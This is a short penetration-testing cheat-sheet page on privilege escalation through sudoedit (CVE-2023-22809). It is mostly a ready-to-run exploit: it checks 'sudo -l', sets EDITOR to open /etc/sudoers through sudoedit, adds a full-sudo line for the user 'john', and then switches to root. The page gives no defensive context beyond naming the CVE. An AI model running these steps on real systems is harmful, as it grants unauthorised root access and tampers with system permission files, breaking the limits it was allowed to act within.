Sudoedit Privilege Escalation

Last modified: 2023-03-29

Privilege Escalation

Sudoedit is vulnerable to privilege escalation.

Investigation

sudo -l

(root) sudoedit /opt/example.txt

If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.


Exploitation (CVE-2023-22809)

export EDITOR="vim -- /etc/sudoers"
sudoedit /opt/example.txt

In vim editor, add the following line in /etc/sudoers.
Assume the current username is “john”

john ALL=(ALL:ALL) ALL

After that, we can escalate to root privilege.

sudo su root

References